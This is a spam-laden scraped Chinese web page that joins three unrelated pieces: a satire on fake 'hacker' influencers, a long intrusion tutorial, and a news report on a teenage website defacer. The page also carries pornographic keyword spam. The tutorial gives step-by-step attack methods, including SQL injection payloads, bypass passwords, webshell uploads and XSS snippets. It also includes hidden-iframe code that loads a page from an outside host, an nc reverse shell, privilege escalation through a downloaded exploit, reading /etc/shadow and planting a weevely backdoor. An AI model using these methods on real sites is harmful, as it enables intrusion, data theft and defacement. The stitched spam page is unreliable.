Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 亚洲资源最新版在线观看,最新亚洲精品国自产在线,国产美女精品在线观看

          整合營銷服務商

          電腦端+手機端+微信端=數據同步管理

          免費咨詢熱線:

          一天吸粉數十萬,“黑客教父”的速成游戲

          一天吸粉數十萬,“黑客教父”的速成游戲

          國人在表達感情方面,總是很含蓄。

          比如,在相親時,越來越多的人不會直接了當的問:“月薪多少?”“有車嗎?”“有房嗎?”

          而是這樣問:“你小區的物業費和停車費多少錢?”

          你瞧,多精辟的問法,一舉多得。

          同樣的,當你成為別人眼里的韭菜時,他也不會直接了當的拿把刀站在你面前。

          而且采用一種很先進的手法:包裝。


          文 | 小胸弟

          01 你和“黑客教父”之間,也許只差一個“入駐”。

          有一群人,他們隱匿在互聯網中,神秘莫測,破譯、入侵,每一個關鍵詞都能引來普通人無限的遐想,一個個生澀難懂的字符亂碼似的堆砌在一起,卻上天入地,無所不能。

          他們、就是黑客。

          你想成為黑客嗎?不是技術至上,而是粉絲成群的那種。

          想的話,接著往下看。

          首先,萬丈高樓平地起,最基礎也是最關鍵的一步,你需要給自己創建一個黑客形象。以下幾個方面可供參考:

          名字,要有俠義內涵,不能常規,要一眼看上去就不一般的那種;

          頭像,一定要黑的深沉,滲透出神秘莫測的氣息;

          簽名,務必要跟上節奏,既要表明自己的身份,還要接地氣,語氣要平易近人。

          有了初步形象,接下來,你需要一群崇拜到想把你親親抱抱舉高高的粉絲。

          如何才能集中獲得一群粉絲呢?首選人流量大的娛樂平臺。

          只需將第一步中精心打造的黑客形象,運用到平臺中即可,不過,為了快速吸粉,還需要一個很關鍵的步驟。

          最近,抖音上有幾個很火的黑客教父,大家搜關鍵字“黑客教父”就能找到。


          為什么說這幾個賬號火呢?因為它們的第一個作品,就成功吸引了數萬名粉絲,而讓人難以置信的是,成功吸粉的視頻,不但不精致,反而是粗制濫造,完全就是用幾張圖片拼湊出來的。

          但它之所以能夠成功吸粉,正是因為造勢。

          “xx入駐抖音,我是一名網絡愛好者、黑客,以后我會更新很多技術教學,你,愿意做我的第一批粉絲嗎?想學什么評論出來,我會盡力滿足你們!”


          你瞧這文案,“入駐”一詞,拔高了自己的地位,“愿意嗎”,迅速拉近與粉絲的距離,“盡力滿足”,達成與粉絲的互動,造勢成功。

          隨后,他們會陸陸續續發一些簡短的教程,比如:

          • 如何用一張照片查出女神地址?問她要一張照片,然后將GPS信息通過經緯度查詢便知。
          • 如何WiFi出門不斷網?進入WiFi設置-打開靜態IP,更改DNS1和DNS2即可。



          樓下有人評論:“從你們外行人角度看,也許覺得很牛逼,但是從我內行人的角度看,也是一臉懵逼。”

          對大部分人來說,看不懂、學不會都是因為自己太菜,跟不上黑客大佬的節奏,崇拜之情更盛。

          當然,光在平臺上有粉絲捧場還不夠,你的目標是成為一名知名黑客,必須突出知名。具體操作包括但不限于:

          • 王婆賣瓜,自賣自夸。

          花點小錢,整幾個小號,在百度貼吧等人流量較大的位置,自問自答。

          比如:你知道XXX嗎?聽說他很厲害。

          當然,他技術很牛的。

          又或者,寫篇關于自己的專訪,越牛逼、越傳奇越好,然后把它發布到各個新聞平臺,這樣,只要有人通過搜索引擎輸入相關名字,就能看到你的事跡了。

          • 營造技術氛圍


          固定經營幾個社交平臺,某空間、某博都行,平日里無事,多發一些能夠彰顯自己技術的動態,自己不懂沒關系,隨便找谷哥度娘一下,但一定要深奧,一般人看不懂的那種。

          重點是,只要營造氛圍就好,千萬別發自拍,一定要保持神秘。

          另外,花幾十塊錢弄個html黑頁,又能迷惑一群小白,你只要手叉腰擺出高級姿態就行。

          按以上流程走下來,只要在搜索引擎上輸入你的名字,你精心打造的過往、專訪、動態,就可以毫無保留地呈現在他人眼中。

          如此這般,你已經是一名“知名黑客教父”了,擁有一群心懷崇拜的粉絲以后,集中拉個群圈養起來,留待日后享用。

          02 有錢的捧個錢場,沒錢的捧個人場。

          在某個黑客教父的視頻后,我通過給出的引流QQ號,加入了幾個不同分享群,發現入群的人可謂是源源不斷,說明這幾位“黑客教父”在抖音上的拉新,效果還是非常顯著。


          在群里潛水了幾天,發現雖然是不同的群,但在留存、促活和簡單變現這幾個環節,還是非常類似的。

          先說留存。如何讓已經進群的人愿意長期停留,最重要的一點,就是你分享的內容,對群里的人來說是否有價值。

          那么,如何找到群成員的興趣點呢?很簡單,粉絲的喜好和需求大多都表露在抖音的評論中。

          再說促活。讓群氣氛活躍起來,才能順利進行后一步的變現,一個僵尸群,就沒有太大的價值。

          鑒于是黑客性質的群,所以群成員中男性比例占據絕對地位,這時候,一些簡單的分享,就能很好的起到促活作用,比如美女壁紙、低段位薅羊毛活動,還包括一些低端的軟件,像紅包外掛、強制聊天程序及破解程序等,常分享常活躍。


          氣氛活了,就可以順理成章的實施變現。我所在的幾個群,都是非常簡單的變現,就是那種看起來互惠互利、雙贏的變現方法。

          像是淘寶優惠券合集、軟件推薦下載之類的,群主都可以從中抽水。


          積少成多,蚊子再小也是肉。

          03 隔行,你就是韭菜。

          看了抖音上這些“黑客教父”們發布的作品,以及聚集的熱情粉絲,老師傅點燃一支煙,露出了少見的詫異表情,大概是驚異這些“黑客”火的毫無道理。

          于是,為了驗證單純崇拜黑客的小白,到底能有多白,我和老師傅試了一試。

          注冊了一個抖音賬號,名字中專門漏出“黑客”字眼,挑選了一個神秘莫測看不清臉的頭像,簡單的圖片和文字拼接后,新鮮出爐了一個作品,配上文案:你們有什么需求,評論告訴我,我來滿足你們。

          簡簡單單一個作品,意外收獲了200多個贊,要知道我有一個朋友,活躍抖音半年了,每個作品的贊還不超過10個。


          翻了翻評論,按目的可以劃分如下:

          • 單純崇拜型。這類人對黑客的印象,還停留在美劇中,但凡看見黑客,就忍不住要大聲呼喊:牛逼(破音);
          • 嗷嗷待哺型。這類人對黑客可能有點誤會,認為黑客就像計算機基礎課的老師一樣,能給你解答各種疑難小問題;
          • 沒法形容型。舉幾個例子:雙色球下期開什么號碼?如何能夠侵入銀行內部進行轉賬?我只能說,走好了您吶~


          隔行如隔山,隔了這座山,你就是別人眼里的韭菜,割你沒商量。

          THE END

          超級英雄還是超級狗熊,你真能分得清嗎?

          “黑客”實戰篇之“網站入侵的攻與防詳解”

          之前在黑客技術文章中講了很多黑客技術原理,近期我將通過文章講述一些黑客實戰內容,想了解黑客實戰技術的朋友可以多關注我的文章。

          今天就以本篇文章內容給大家講述一下黑客"入侵網站的"基本流程以及技術實現過程!

          一、 先摸清網站的基本架構(知己知彼學習)

          常見的幾種基本架構如下:

          1、單機模式

          應用程序、數據庫、文件等所有資源都集中在一臺 Server上,典型案例:基于 LAMP 架構的 PHP 網站;

          單機時代(純依賴RDBMS)

          優點:簡單、快速迭代達成業務目標;缺點:存在單點、談不上高可用;技術點:應用設計要保證可擴展;

          2、單機+緩存模式

          有一定的業務量和用戶規模了,想提升網站速度,于是,緩存出場了

          單機時代+緩存出場

          優點:簡單有效、方便維護;缺點:存在單點、談不上高可用;技術點:客戶端(瀏覽器)緩存、前端頁面緩存、頁面片段緩存、本地數據緩存/數據庫緩存、遠程緩存;

          3、數據服務與應用分離模式

          用戶量每天在增長,數據庫瘋狂讀寫,逐漸發現一臺服務器快撐不住了。于是,決定把數據服務和APP做分離

          數據服務與應用分離

          優點:簡單有效、方便維護、提高不同Server對硬件資源的利用率;缺點:存在單點、談不上高可用;技術點:文件服務器部署、數據庫服務器,擴展數據訪問模塊;

          分離后三臺 Server 對硬件資源的需求各不相同:

          4、數據庫讀寫分離模式

          單臺數據庫也感覺快撐不住了,一般都會嘗試做"讀寫分離"。由于大部分互聯網"讀多寫少"的特性所決定的。Salve的臺數,取決于按業務評估的讀寫比例。

          數據庫讀寫分離

          優點:簡單有效、降低數據庫單臺壓力;缺點:讀寫分離,增加程序難度,架構變復雜,維護難度增加;技術點:數據庫主從同步部署,擴展數據訪問模塊,實現讀寫分離;

          5、應用服務集群模式

          數據庫層面是緩解了,但是應用程序層面也出現了瓶頸,由于訪問量增大,加上早期程序員水平有限寫的代碼也很爛,人員流動性也大,很難去維護和優化。所以,很常用的辦法還是"堆機器"。

          應用出現瓶頸 負載均衡集群

          優點:增加服務器和HA機制,系統性能及可用性得到保證;缺點:應用之間緩存、Session一致性問題;技術點:負載均衡;

          通過集群解決高并發、海量數據問題的常用手段,實現系統的可伸縮性。通過負載均衡調度器,可將用戶訪問分發到集群中的某臺 Server 上,應用服務器的負載壓力不再成為整個網站的瓶頸。

          6、集中式緩存、Session集中存儲

          加機器誰都會加,關鍵是加完之后得有效果,加完之后可能會引發一些問題。例如非常常見的:集群應用之間頁面輸出緩存和本地緩存一致性的問題,Session保存的問題......

          集中式緩存 Session集中存儲

          優點:應用之間緩存、Session一致,存儲無限制,可以擴展;缺點:不如本地緩存訪問快,緩存服務器、Session服務器等仍存在單點問題;技術點:緩存服務器部署、Session集中存儲方案;

          7、動靜分離

          動靜分離也是提高網站響應速度的一種常用方式。將動態請求與靜態請求分離開,盡量減少對應用服務器的壓力。同時,可以再進一步對靜態請求,進行緩存,以加快響應速度。可以需要開發人員配合(把靜態資源放獨立站點下),也可以不需要開發人員配合(利用7層反向代理來處理,根據后綴名等信息來判斷資源類型)。

          使用動靜分離

          優點:減輕應用負載壓力,針對靜態文件緩存;缺點:靜態文件緩存更新失效問題;技術點:動靜分離、靜態文件緩存方案;

          8、反向代理和CDN加速網站響應

          使用反向代理和CDN加速網站響應:CDN 和反向代理的基本原理都是緩存,區別在于:

          1. CDN部署在網絡提供商的機房;

          2. 反向代理則部署在網站的中心機房;

          使用 CDN 和反向代理的目的都是盡早返回數據給用戶,一方面加快用戶訪問速度,另一方面也減輕后端服務器的負載壓力。

          使用反向代理和 CDN 加速網站響應

          優點:減輕應用負載壓力,異地緩存有效解決不同地方用戶訪問過慢的問題;缺點:成本大幅增加,架構進一步復雜化,也維護難度進一步增大,靜態文件緩存更新失效問題;技術點:CDN、反向代理方案;

          9、使用NoSQL和搜索引擎

          到這里,已經基本做到了DB層面和應用層面的橫向擴展了,可以開始關注一些其它方面,例如:站內搜索的精準度,對DB的依賴,開始引入全文索引、NoSQL

          NoSQL和搜索引擎都是源自互聯網的技術手段,對可伸縮的分布式特性具有更好的支持。應用服務器則通過一個統一數據訪問模塊訪問各種數據,減輕應用程序管理諸多數據源的麻煩。

          使用NoSQL和搜索引擎

          優點:降低DB依賴;缺點:單點問題,談不上高可用;技術點:NoSQL、搜索引擎、分布式;

          網站的入侵基本流程

          1、信息收集

          1) Whois信息--注冊人、電話、郵箱、DNS、地址

          2) Googlehack--敏感目錄、敏感文件、后臺地址

          3) 服務器IP--Nmap掃描、端口對應的服務、C段

          4) 旁注--Bing查詢、腳本工具

          5) 如果遇到CDN--Cloudflare(繞過)、從子域入手(mail,postfix)、DNS傳送域漏洞

          6) 服務器、組件(指紋)--操作系統、web server(apache,nginx,iis)、腳本語言,數據庫類型

          2、漏洞挖掘

          1) 探測Web應用指紋--如博客類:Wordpress、Emlog、Typecho、Z-blog,社區類:Discuz、PHPwind、Dedecms,StartBBS、Mybb等等,PHP腳本類型:Dedecms、Discuz!、PHPCMS、PHPwind

          2) XSS、CSRF、SQLinjection、權限繞過、任意文件讀取、文件包含...

          3) 上傳漏洞--截斷、修改、解析漏洞

          4) 有無驗證碼--進行暴力破解

          3、漏洞利用

          1) 思考目的性--達到什么樣的效果

          2) 隱藏,破壞性--根據探測到的應用指紋尋找對應的exp攻擊載荷或者自己編寫

          3) 開始漏洞攻擊,獲取相應權限,根據場景不同變化思路拿到webshell

          4、權限提升

          1) 根據服務器類型選擇不同的攻擊載荷進行權限提升

          2) 無法進行權限提升,結合獲取的資料開始密碼猜解,回溯信息收集

          5、植入后門

          1) 隱蔽性

          2) 定期查看并更新,保持周期性

          6、日志清理

          1) 偽裝,隱蔽,避免激警他們通常選擇刪除指定日志

          2) 根據時間段,find相應日志文件 太多太多。

          三、 黑客入侵網站的常規思路方法

          1、經典注入

          通常,判斷一個網站是否存在注入點,可以用',and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,來判斷,如果and 1=1正常返回頁面,1=2錯誤,或者找不到,那么就存在注入點

          2、萬能密碼OR漏洞

          萬能密碼'or'='or',可以用在后臺管理輸入,有的網站由于沒有過濾OR漏洞,輸入OR直接就可以突破,一般漏洞存在于ASP類型的網站

          3、爆庫

          爆庫,可以理解為爆出數據庫下載,用爆庫之類的工具可以直接就獲得管理員用戶和密碼,%5C為十六進制的\符號,而數據庫大于5.0就可以進行爆庫,如在PHP手工高級注入時,用VERSION()這個變量猜出網站數據庫版本,如果一個網站數據庫大于5.0,且是ACESS數據庫,那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我們直接把%5C加到RPC后面,因為%5C是爆二級目錄,所以應該是這樣,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理員為了防止他人非法下載數據庫,而把數據庫改成#database.mdb,這樣防止了,如果頁面地址為http://www.xx.com/rpd/#database.mdb,是這樣的,那么我們把%23加到替換#,http://www.xx.com/rpd/%23database.mdb

          4、COOKIE中轉,SQL防注入程序,提醒你IP已被記錄

          COOKIE中轉,SQL防注入,如果檢測一個網站時,彈出這樣一個對話框,上面出現SQL防注入程序提醒的字語,那么我們可以利用COOKIE中轉,注入中轉來突破,方法是先搭建一個ASP環境(且網站為ASP網站),然后打開中轉工具,記住一個網站的頁面地址粘貼進工具里,值是多少就寫多少,生成,把生成的文件放到目錄里,接下來,打開網頁,輸入http://127.0.0.1:(端口)/目錄里文件,如果正常,那么輸入http://127.0.0.1:端口/值(目錄文件)?提交值,那么拿到工具里猜表名,列名了

          5、手工

          ASP手工語句表名 and exists (select * from 表名)

          列名 and (select count(列名) from 表名)>0

          長度 and (select top 1 len(username) from admin)>0

          內容 and (select top 1 asc(mid(username,1,1)) from admin)>100

          PHP手工語句:order by(猜字段),and 1=2 union select (字段數)and 1=2 union selsect from(位置)

          幾個常用變量 ,USER(),VERSION()<數據庫版本),database()<數據庫名稱>

          6、抓包拿WEBSHELL

          如果進入后臺發現,點數據庫備份的時候發現找不到,可以通過抓包來獲得上傳,拿到WEBSHELL,工具WOSCK抓包,一張圖片,一個ASP馬,自行搭建一個上傳地址,UPLOAD加載,UPFILE上傳,COOKIS=( )

          7、數據庫備份拿WEBSHELL和一句話木馬入侵

          通常進入后臺了,發現有數據庫備份,拿WEBSHELL吧,找一個添加產品的地方,傳一個大馬,格式為JPG圖片,然后把圖片地址粘貼到數據庫備份那里,給起個名字,如SHELL.ASP,然后合地址訪問的時候就進入webshell了,一句話木馬入侵,先編輯記事本,加入一句話,改為2.jpg,然后備份,訪問,發現500內部服務器錯誤,證明一句話成功,接下來用一句話木馬客戶端連接,得到路徑頁面,然后改下馬名,輸入大馬內容,提交,得到WEBSHELL

          8、DB權限差異備份拿WEBSHELL

          如果一個網站注入點是MYSQL數據庫,且是DB權限,或者是SA權限,能夠列目錄,那么就好辦了,找到網站的目錄,目錄通常在D和E盤,備份個小馬,合地址訪問看看成功沒,直接備份大馬貌似不行,成功后,再輸入大馬內容,拿到WEBSHELL

          9、找后臺

          找后臺,一般默認為admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,當然,這只是默認,一些大網站不可能還用admin作為后臺,有的隱藏很深,可以簡單用site:網站 inurl:后臺來猜,或者下載源HTML文件分析找出后臺,或者用各種工具來掃描了,方法很多的

          10、腳本提示

          有的網站要求進入后臺會出現一個腳本提示,就像VB編程里INPUTBOX "",一個對話輸入框,我們輸入administrator突破,admin代表以管理員身份來進入

          11、php后門和EWEBEDITOR編輯器入侵

          PHP后門,如之前爆出的DISZ漏洞,在一個PHP網站后面加C.PHP,如果出現1,那么傳個PHP馬就拿到WEBSHELL,EWEBEDITOR編輯器入侵,是很快速的方式,設置好上傳文件類型,傳ASA,或者其他的格式,然后訪問拿到WEBSHELL,如沒有直接加語句拿到WEBSHELL

          12、上傳漏洞

          有的網站雖然沒有注入點,但存在一個上傳漏洞,那么我們如何來利用了,首先,打開上傳地址看是否存在,如果有,試想傳一個ASP大馬是不行的,那么傳一句話看看,先看能成功不,用明小子來上傳,動網,動力,動感,喬客4種方式,頁面地址格式要對應,如果一個網站地址彈出對話框,顯示上傳成功,那么證明可以拿到WEBSHELL,傳馬,另外有的沒有任何顯示,直接空的,那么可以構建兩個上傳,第一個傳JPG的圖片,第二個傳ASP馬(大馬),記住,大馬后面要有個空格才行,如果一個網站地址出現文件類型不正確,請重新上傳,那么證明%90可以拿到WEBSHELL,只是格式不對,不允許,改后綴,只要是網站沒有過濾的格式,如果一個網站地址顯示請登陸再上傳,那么證明沒有拿到COOKIS,思路是在該網站注冊一個用戶,得到COOKIS,然后上傳就成功了

          13、簡單提權拿下服務器和SERV提權和pcanywhere三方提權

          簡單拿下服務器,也就是拿下網站IP主機,首先我們需要一個WEBSHELL,然后看看組件信息,看看路徑可讀可以寫不,如果有一個可以,那么來到CMD命令下,首先輸入可寫的文件內容,執行命令加一個帳號和最高管理權限,然后輸入netstat -an,得到主機連接端口,然后用3389連接進入,讓其成為肉雞(最好),這樣比較隱蔽我們操作

          14、反查入侵和旁注和社會工程學

          反查IP入侵,也就是入侵21,端口,首先我們入侵網站先PING WWW.XXX.COM ,出IP,然后到反查IP站點查掛了多少個域名,接下來,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探測密碼,登陸ftp://ip,輸入用戶和密碼,改掉信息等等,社會工程學X-WAY,來得到FTP密碼,也需要收集,并不是每個都行,總之是自己的經驗

          15、跨站腳本攻擊

          跨站(CSS),被動攻擊,現在需要更多的思路和經驗了

          三段經典跨站代碼

          <script>alert("跨站開始")</script>

          <script>alert("document.cookie")</script>

          <script>window.open(http://www.hackgirl.net)</script>

          16、特殊空格

          利用TAB制作的特殊空格,然后注冊時輸入空格,加管理名字,隨便在網站上找個斑竹,或者管理的名字,這樣來注冊,有時自己注冊的這個也會變成管理員

          17、改主頁

          改主頁,拿到WEBSHELL后,先找出首頁文件,一般為index.asp,index.php.index.jsp,index.html,然后來到站點根目錄,編輯index.asp(首頁),清空,最好備份,輸入自己的主頁代碼(黑頁),保存,再訪問時已經變成自己想要的結果了

          18、掛馬

          首先在WEBSHELL里,建立一個文本,改為1.htm,接下來在主頁最下面掛

          兩段經典掛馬代碼

          <html>

          <iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>

          </html>

          <SCRIPT language=javascript>

          window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");

          </script>

          四、 網站入侵全過程實例

          假設入侵的網站域名是hack-test.com

          第一步:用ping命令獲取網站服務器的IP地址

          現在我們獲取了網站服務器的IP地址為:173.236.138.113

          第二步:尋找同一服務器上的其它網站,我們使用sameip.org.

          26 sites hosted on IP Address 173.236.138.113

          173.236.138.113上有26個網站,很多黑客為了攻破你的網站可能會檢查同服務器上的其它網站,但是本次是以研究為目標,我們將拋開服務器上的其它網站,只針對本次測試的網站來進行入侵檢測。

          第三步:查詢關于網站的以下信息:

          1. DNS records (A, NS, TXT, MX and SOA)

          2. Web Server Type (Apache, IIS, Tomcat)

          3. Registrar (the company that owns your domain)

          4. Your name, address, email and phone

          5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

          6. Your server OS (Unix,Linux,Windows,Solaris)

          7. Your server open ports to internet (80, 443, 21, etc.)

          讓我們開始找網站的DNS記錄,我們用who.is來完成這一目標.

          發現DNS記錄如下:

          確定web服務器的類型:

          發現Web服務器是apache,接下來確定它的版本.

          IP: 173.236.138.113

          Website Status: active

          Server Type: Apache

          Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

          Page Views per Visit: 1 Month: 2.0 3Month: 3.7

          接下來尋找網站域名的注冊信息,你的電話、郵箱、地址等

          現在已經獲取了你的網站域名的注冊信息,包括你的重要信息等.

          接下來可以通過backtrack5中的whatweb來獲取網站服務器操作系統類型和服務器的版本:

          發現網站使用了著名的php整站程序wordpress,服務器的的系統類型為FedoraLinux,Web服務器版本Apache 2.2.15。

          繼續查看網站服務器開放的端口,用滲透測試工具nmap:

          1、Find services that run on server(查看服務器上運行的服務)

          2、Find server OS(查看操作系統版本)

          只有80端口是開放的,操作系統是Linux2.6.22(Fedora Core 6),現在已經收集了所有關于網站的重要信息,接下來開始掃描尋找漏洞,比如:

          Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等

          3、用Nikto來收集漏洞信息:

          root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

          4、用到Backtrack 5 R1中的W3AF 工具:

          root@bt:/pentest/web/w3af#./w3af_gui

          輸入要檢測的網站地址,選擇完整的安全審計選項

          稍等一會,將會看到掃描結果

          發現你的網站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.讓我們來探討SQL注入漏洞.

          http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

          第四步:通過工具發現這個URL存在SQL注入,我們通過Sqlmap來檢測這個url.

          Using sqlmap with –u url

          輸入N按回車鍵繼續

          發現你的網站存在mysql顯錯注入,mysql數據庫版本是5.0. 我們通過加入參數"-dbs"來嘗試采集數據庫名

          發現三個數據庫,接下來通過參數"-D wordpress -tables"來查看wordpress數據庫的所有表名

          通過參數"-T wp_users –columns "來查看wp_users表中的字段.

          接下來猜解字段user_login和user_pass的值.用參數"-C user_login,user_pass–dump"

          會發現用戶名和密碼hashes值

          第五步:通過以下在線破解網站來破解密碼hashes

          http://www.onlinehashcrack.com/free-hash-reverse.php

          第六步:登陸wordpress的后臺wp-admin

          嘗試上傳php webshell到服務器,以方便運行一些linux命令.在插件頁面尋找任何可以編輯的插件.我們選擇Textile這款插件,編輯插入我們的php webshell,點擊更新文件,然后訪問我們的phpwebshell.

          Phpwebshell被解析了,我們可以控制網站的文件,但是我們只希望獲得網站服務器的root權限,來入侵服務器上其它的網站。

          第六步:用NC來反彈一個shell

          首先在我們的電腦上監聽5555端口。

          然后在Php webshell上反向連接我們的電腦,輸入IP和端口5555.

          點擊連接我們會看到

          接下來我們嘗試執行一些命令:

          id

          uid=48(apache) gid=489(apache) groups=489(apache)

          (用來顯示用戶的id和組)

          pwd

          /var/www/html/Hackademic_RTB1/wp-content/plugins

          (顯示服務器上當前的路徑)

          uname -a

          Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

          (顯示內核版本信息)

          現在我們知道,服務器的內核版本是2.6.31.5-127.fc12.1686,我們在exploit-db.com中搜索此版本的相關漏洞.

          第七步:在服務器上測試了很多exp之后,用以下的exp來提升權限.

          http://www.exploit-db.com/exploits/15285

          在nc shell上執行以下命令:

          wgethttp://www.exploit-db.com/exploits/15285 -o roro.c

          (下載exp到服務器并重命名為roro.c)

          注:很多linux內核的exp都是C語言開發的,因此我們保存為.c擴展名.

          exp roro.c代碼如下:

          #include

          #define RECVPORT 5555

          #define SENDPORT 6666

          int prep_sock(int port)

          {

          int s, ret;

          struct sockaddr_in addr;

          s=socket(PF_RDS, SOCK_SEQPACKET, 0);

          if(s < 0)

          {

          printf("[*] Could not open socket.");

          exit(-1);

          }

          memset(&addr, 0, sizeof(addr));

          通過以上代碼我們發現該exp是C語言開發的,我們需要將他編譯成elf格式的,命令如下:

          gcc roro.c –ororo

          接下來執行編譯好的exp

          ./roro

          執行完成之后我們輸入id命令

          id

          發現我們已經是root權限了

          uid=0(root) gid=0(root)

          現在我們可以查看/etc/shadow文件

          cat/etc/shadow

          第八步:用weevely制作一個php小馬上傳到服務器上,留個后門

          1、weevely使用選項

          root@bt:/pentest/backdoors/web/weevely#./main.py

          2.用weevely創建一個密碼為koko的php后門

          root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

          接下來上傳到服務器之后來使用它

          root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

          測試我們的hax.php后門

          以上就是入侵網站的全過程實例描述!

          五、如何判斷網站被黑?如何應對網站被黑?如何防止網站被黑?

          1、如何判斷網站被黑?

          如果存在下列問題,則您的網站可能已經被黑客攻擊:

          1) 通過site命令查詢站點,顯示搜索引擎收錄了大量非本站應有的頁面。

          2) 從百度搜索結果中點擊站點的頁面,跳轉到了其他站點。

          3) 站點內容在搜索結果中被提示存在風險。

          4) 從搜索引擎帶來的流量短時間內異常暴增。

          一旦發現上述異常,建議您立即對網站進行排查。包括:

          1、分析系統和服務器日志,檢查自己站點的頁面數量、用戶訪問流量等是否有異常波動,是否存在異常訪問或操作日志;

          2、檢查網站文件是否有不正常的修改,尤其是首頁等重點頁面;

          3、網站頁面是否引用了未知站點的資源(圖片、JS等),是否被放置了異常鏈接;

          4、檢查網站是否有不正常增加的文件或目錄;

          5、檢查網站目錄中是否有非管理員打包的網站源碼、未知txt文件等。

          2、如何應對網站被黑?

          如果排查確認您的網站存在異常,此時您需要立即做出處理,包括:

          1) 立即停止網站服務,避免用戶繼續受影響,防止繼續影響其他站點(建議使用503返回碼)。

          2) 如果同一主機提供商同期內有多個站點被黑,您可以聯系主機提供商,敦促對方做出應對。

          3) 清理已發現的異常,排查出可能的被黑時間,和服務器上的文件修改時間相比對,處理掉黑客上傳、修改過的文件;檢查服務器中的用戶管理設置,確認是否存在異常的變化;更改服務器的用戶訪問密碼。

          注:可以從訪問日志中,確定可能的被黑時間。不過黑客可能也修改服務器的訪問日志。

          4) 做好安全工作,排查網站存在的漏洞,防止再次被黑。

          3、如何防止網站被黑?

          1) 為避免您的網站被黑客攻擊,您需要在平時做大量的工作,例如

          2) 定期檢查服務器日志,檢查是否有可疑的針對非前臺頁面的訪問。

          3) 經常檢查網站文件是否有不正常的修改或者增加。

          4) 關注操作系統,以及所使用程序的官方網站。如果有安全更新補丁出現,應立即部署,不使用官方已不再積極維護的版本,如果條件允許,建議直接更新至最新版;關注建站程序方發布的的安全設置準則。

          5) 系統漏洞可能出自第三方應用程序,如果網站使用了這些應用程序,建議仔細評估其安全性。

          6) 修改開源程序關鍵文件的默認文件名,黑客通常通過自動掃描某些特定文件是否存在的方式來判斷是否使用了某套程序。

          7) 修改默認管理員用戶名,提高管理后臺的密碼強度,使用字母、數字以及特殊符號多種組合的密碼,并嚴格控制不同級別用戶的訪問權限。

          8) 選擇有實力保障的主機服務提供商。

          9) 關閉不必要的服務,以及端口。

          10) 關閉或者限制不必要的上傳功能。

          11) 設置防火墻等安全措施。

          12) 若被黑問題反復出現,建議重新安裝服務器操作系統,并重新上傳備份的網站文件。

          年攻擊十余網站獲利萬余元

          衡陽全搜索網訊(記者 姚永軍 通訊員 趙四榮 程建銘)近日,衡南縣公安局網安大隊在市公安局網技支隊的大力支持下,成功破獲一起黑客非法侵入網站案,犯罪嫌疑人閆某飛因未滿16歲,警方依法對其處以治安處罰,并責令其監護人加強教育。

          今年8月21日,衡南縣公安局接到上級交辦案件線索:衡南縣某小學網站被黑客攻擊并上傳黑頁、黑鏈。網安大隊立即開展調查取證。民警調查發現,衡南縣某小學網站的系統文件里被人從后臺植入了一個文件,點擊該文件,就會在網站打開一個黑頁面,造成該計算機信息系統不能正常運行,嚴重影響該校的網絡安全及正常教學秩序。

          由于該案系衡南縣首起非法入侵計算機系統違法犯罪,該局領導高度重視,組織精干警力迅速投入偵查。11月,通過大量偵查工作鎖定河南籍的閆某飛(男,15歲)有重大作案嫌疑。12月7日,辦案民警趕赴河南某縣開展工作,在當地公安機關協助下成功掌握嫌疑人閆某飛的租住地址。12月8日晚,閆某飛在其父親陪同下到公安機關投案自首。

          經訊問,閆某飛自2017年6月份開始在網上QQ群學習黑客技術,并在一個網站里尋找曾被其他人進行過黑客攻擊的網站網址,然后將自己制作好的后綴名為“.html”的黑頁上傳植入這些網站進行二次攻擊。通過該方式閆某飛共向包括衡南縣某小學網站在內的全國十余個網站后臺植入黑頁、黑鏈,非法獲利10000余元。

          由于閆某飛未滿16周歲,衡南警方依法對閆某飛作出行政拘留5日的處罰,并追繳其違法所得。


          主站蜘蛛池模板: 久久一区二区明星换脸| 波多野结衣一区二区三区88| 国产熟女一区二区三区五月婷| 国产成人精品a视频一区| 亚洲综合一区二区精品久久| 久久精品一区二区影院| 国产无人区一区二区三区| ...91久久精品一区二区三区| 精品无码综合一区| 男人免费视频一区二区在线观看| 韩国一区二区视频| 久久精品国产一区二区三| 国产美女露脸口爆吞精一区二区| 精彩视频一区二区| 国产成人免费一区二区三区| 亚洲日韩AV一区二区三区中文 | 亚洲成av人片一区二区三区 | 欧美一区内射最近更新| 蜜桃视频一区二区三区在线观看| 国产一区二区福利| 福利一区二区三区视频在线观看| 国产一区二区三区高清在线观看| 中文字幕一区在线播放| 日韩人妻无码一区二区三区综合部| 亚洲视频在线一区二区| 99久久精品费精品国产一区二区| 国产精品小黄鸭一区二区三区 | 国产精品免费一区二区三区| 一区二区三区www| 国产午夜三级一区二区三| 中文字幕精品无码一区二区三区 | 国产一区中文字幕在线观看| 国模精品视频一区二区三区| 免费看无码自慰一区二区| 国产在线精品一区在线观看| 亚洲国产一区二区三区| 国产一区二区精品久久凹凸| 久久99精品波多结衣一区| 亚洲美女视频一区| 国产精品成人一区二区三区| 亚洲国产专区一区|